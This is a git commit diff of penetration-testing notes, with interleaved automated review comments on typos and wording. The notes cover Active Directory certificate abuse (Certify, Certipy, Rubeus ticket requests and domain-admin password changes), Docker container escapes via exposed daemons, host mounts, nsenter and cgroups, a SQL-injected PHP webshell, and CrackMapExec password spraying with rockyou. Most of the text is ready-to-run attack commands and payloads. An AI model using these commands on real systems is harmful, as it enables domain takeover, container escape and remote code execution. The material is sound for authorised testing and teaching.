AD certificate and docker escapes

This commit is contained in:
whackx 2024-01-11 05:40:49 +01:00
parent 74845509af
commit bbef002f0a
3 changed files with 87 additions and 48 deletions

View File

@ -28,6 +28,14 @@ Exploitable templates should have the following traits:
* Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
#### Certify
Find information about all registered CAs. For a start take a look at least at
```sh
Certify.exe find /vulnerable
```
### Certificate Creation
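Review bot: the third trait line is hard to parse: "Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`" mixes a definition with a dangling comma; suggest "Enrollee may supply the subject alternative name (SAN), which ends up in the Kerberos ticket --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`". It would also help readers to state that the three traits together (low-privileged enrollment, client-authentication EKU, enrollee-supplied SAN) are what makes a template exploitable, since the list introduction only says "should have the following traits". Minor: `net user <username> /domain` shows a user's group memberships rather than "finding groups", so "Check the user's group membership via" reads more accurately.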
@ -36,18 +44,25 @@ Exploitable templates should have the following traits:
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
* An alternative is certipy-ad
An alternative is certipy-ad
#### Certipy-AD
First `pip install certipy-ad`
Take a look at the Documentation provided in the [git repositories'
README](https://github.com/ly4k/Certipy?source=post_page-----c56f238991c0--------------------------------#esc7).
Since it is possible to create certifcates of (Sub)CAs if you do have the right permissions on CA directly, it is worth a check.
[Hacktricks' AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation) provides the details.
### Impersonation
* Request TGT with the created cert
* Grab TGT
Request TGT with the created cert.
* On the machine via
#### On the target machine via
```sh
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
```
* Select a domain admin via opening `Active Directory Users and Computers`
Select a domain admin via opening `Active Directory Users and Computers`
```sh
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
```
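Review bot: "An alternative is certipy-ad" now appears twice in a row (the old bullet and the new plain line), and likewise "Request TGT with the created cert" and "Select a domain admin via opening ..." are each duplicated; the leftover copies should be dropped. Typo: "certifcates" should be "certificates". The Certipy link carries Medium tracking parameters (`?source=post_page-----c56f238991c0---...`); the plain URL `https://github.com/ly4k/Certipy#esc7` is enough. The heading "#### On the target machine via" ends with a dangling "via". In the `changepw` command the placeholder `/dc:<domain of controller>` should read `/dc:<IP or hostname of domain controller>`, matching the `/dc:<IP of domain controller>` wording used in the `asktgt` line above it.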
@ -61,6 +76,13 @@ exit
dir \\<domain>\<dir>$\
```
#### On the attacking machine
Use impacket's psexec
```sh
psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
```
## CVE-2022-26923
* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions
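Review bot: the `psexec.py $DOMAIN/administrator@$DOMAIN` line uses `$DOMAIN` both as the domain and as the target host after the `@`; the target should be a host placeholder such as `$TARGET_IP` so the example is not misread. The bullet under "## CVE-2022-26923" ("Aims on abusing templates configuration, the Subject Alternative Name `SAN`") describes the same enrollee-supplied SAN condition already covered by the template traits at the top of the file, so it does not say what is specific to this CVE; suggest either stating what distinguishes it or linking the advisory, and fixing "Aims on" to "Aims at".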

View File

@ -54,45 +54,39 @@ curl http://example.com:5000/v2/<REPOSITORY>/tags/list
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
```
## Reversing Docker Images
## Remote Docker Daemon
* [Dive](https://github.com/wagoodman/dive)
Users inside the `docker` group may open tcp socket through docker
In case you find an exposed docker daemon it can be used in the following way
```sh
dive <IMAGE-ID>
docker -H tcp://$TARGET_IP:2375 ps
docker -H tcp://$TARGET_IP:2375 images
docker -H tcp://test.com:2375 exec <container> <cmd>
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
```
## Uploading Images to Registry
* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
## RCE via Exposed Docker Daemon
* Users inside the `docker` group may open tcp socket through docker
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
* Confirming via `curl http://test.com:2375/version` on open docker port
* Execute commands on socket
Execute commands on socket
```sh
docker -H tcp://test.com:2375 ps
docker -H tcp://test.com:2375 exec <container> <cmd>
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
```
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
## Escape Container via Exposed Docker Daemon
* Looking for exposed docker sockets
Look out for exposed docker sockets
```sh
find / -name "*sock" 2>/dev/null
groups
```
* Mount the host volume and chroot to it, need alpine image.
Mount the host volume and chroot to it. Ideally, use an image that is
installed already, e.g. alpine here.
```sh
docker images
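Review bot: placeholders are inconsistent within single blocks: `$TARGET_IP`, `test.com` and `example.com` are mixed in the daemon and registry examples, which suggests some lines were pasted from different sources; pick one placeholder per file. Grammar: "Users inside the `docker` group may open tcp socket through docker" should be "may open a TCP socket to the Docker daemon", and "Ever image has a `latest` tag" should be "Every image". The `curl http://test.com:2375/version` check is a good confirmation step and worth keeping next to the `nmap` line; it is also the simplest way for a defender to verify whether a daemon answers unauthenticated on 2375. Under "## Escape Container via Exposed Docker Daemon", `find / -name "*sock"` also matches files that merely end in "sock"; `-name "*.sock"` is more precise.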
@ -107,34 +101,27 @@ docker run -v /:/host --rm -it <imageID> chroot /host/ bash
## Shared Namespaces
* Namespaces
* Cgroups
* OverlayFS
* Requires root inside the container
* Execute command
Requires root inside the container
```sh
nsenter --target 1 --mount sh
nsenter --target 1 --mount --uts --ipc --net /bin/bash
```
## Misconfiguration
### capabilities
### Capabilities
* Privileged container connect to the host directly, not through the docker engine
* Execution of bins on the host from libs inside the container is possible
Privileged container connect to the host directly, not through the docker engine.
Execution of binaries on the host from inside the container is possible.
```sh
capsh --print
```
* `man capabilities`
* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
* Exploit and get a reverse shell to the host via
Exploit and get a reverse shell to the host via
```sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
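Review bot: the three bullets "Namespaces", "Cgroups", "OverlayFS" under "## Shared Namespaces" are left without any explanation of what to check for each; either expand them or drop them. "Requires root inside the container" is necessary but not sufficient for `nsenter --target 1`: PID 1 is only the host init when the container shares the host PID namespace, so the requirement is worth stating next to the command. Grammar: "Privileged container connect to the host directly" should be "A privileged container connects to the host directly". The Trail of Bits link carries a browser text-fragment (`#:~:text=...`); the plain article URL is more portable.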
@ -147,7 +134,7 @@ chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
* The file may appear outside the container on the host system
Caveat: The file may appear outside the container on some host systems. Have to investigate...
### cap_admin
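Review bot: "Have to investigate..." is an unresolved note left in the document; either replace it with an explicit TODO marker or remove it until the behaviour is confirmed. The heading "### cap_admin" does not match the capability named in the linked PoC (SYS_ADMIN) or the output format of `capsh --print`; "### cap_sys_admin" would be consistent with both.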
@ -169,8 +156,8 @@ the docker volume, e.g.
## Check fdisk
* `fdisk -l` and `lsblk`, host bulk device may be exposed
* Mount the device
`fdisk -l` and `lsblk`, host bulk device may be exposed
Mount the device
```sh
mkdir /mnt/hostdev
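Review bot: "host bulk device" should be "host block device" (`lsblk` lists block devices), and the line "`fdisk -l` and `lsblk`, host bulk device may be exposed" is a fragment; suggest "Run `fdisk -l` and `lsblk`; a host block device may be exposed inside the container."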
@ -218,6 +205,20 @@ Connection: Upgrade
Upgrade: tcp
```
## Reversing Docker Images
* [Dive](https://github.com/wagoodman/dive)
```sh
dive <IMAGE-ID>
```
## Uploading Images to Registry
* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
## Escape through DB
* Login into DB
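Review bot: the "Ever image has a `latest` tag" typo was carried over when the section was moved here; fix it as part of the move ("Every image"). The statement is also imprecise: `latest` is only the default tag Docker uses when none is given, so an image need not have it; "Pulls without a tag default to `latest`, so a modified image pushed as `latest` gets pulled by default" states the actual risk the Trend Micro article describes. "Login into DB" should be "Log in to the DB".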
@ -226,14 +227,14 @@ Upgrade: tcp
* Select table content into a file the user can read
* Execute the file
```sql
```SQL
create table h4x0r (pwn varchar(1024));
insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
```
* curl the webshell hon the exploited host
curl the webshell hon the exploited host
```sh
curl <host-IP>/shell.php?cmd=id
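Review bot: `# In case of PostreSQL` is not a SQL comment (`#` is only accepted by MySQL), so the PostgreSQL `copy ... to` line fails on the database it is meant for; use `-- In case of PostgreSQL` and fix the "PostreSQL" typo. Changing the fence tag from `sql` to `SQL` gains nothing and some renderers match tags case-sensitively; keep lowercase. Typo: "curl the webshell hon the exploited host" should be "on the exploited host", and the `sh` fence opened before the `curl` line needs its closing fence.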

View File

@ -1,23 +1,39 @@
# Crackmapexec
* Dictionary attack against SMB
```sh
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
## Dictionary attack against SMB
```sh
cme <smb/mssql> <domain/IP> -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute
```
* Use the password with `impacket/examples/psexec.py` in the following way
## Brute Force attack against SMB
Brute force attack using an anonymous user
```sh
cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000
```
## Use Found Password
Use the password with `impacket/examples/psexec.py` in the following way
```sh
psexec.py domain.name/<user>:<password>@<target-IP>
```
## Shares
## Enumerate Shares
* Check user permissions on shares
``sh
Check user permissions on shares
```sh
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
```
## SMB
* Check user hash on the network via smb
Check user hash on the network via smb
```sh
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
```
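Review bot: `--continue-on-sucess` is misspelled and will be rejected by the tool; it should be `--continue-on-success`. The stray ` s ` in `-u <user> s -p ...` (present in both the old and new line) looks like a leftover and makes the command fail. The "## Enumerate Shares" section has a broken fence: ``` ``sh ``` (two backticks) opens nothing, so the old line should be removed along with the duplicated "Check user permissions on shares" sentence. The heading "## Brute Force attack against SMB" describes `--rid-brute 10000` with an anonymous user, which is RID cycling for user enumeration rather than password brute forcing; "## User Enumeration via RID Brute Force" would match the command. "## SMB" is too generic as a heading for the pass-the-hash check below it; "## Check Hash via SMB" mirrors the sentence that follows.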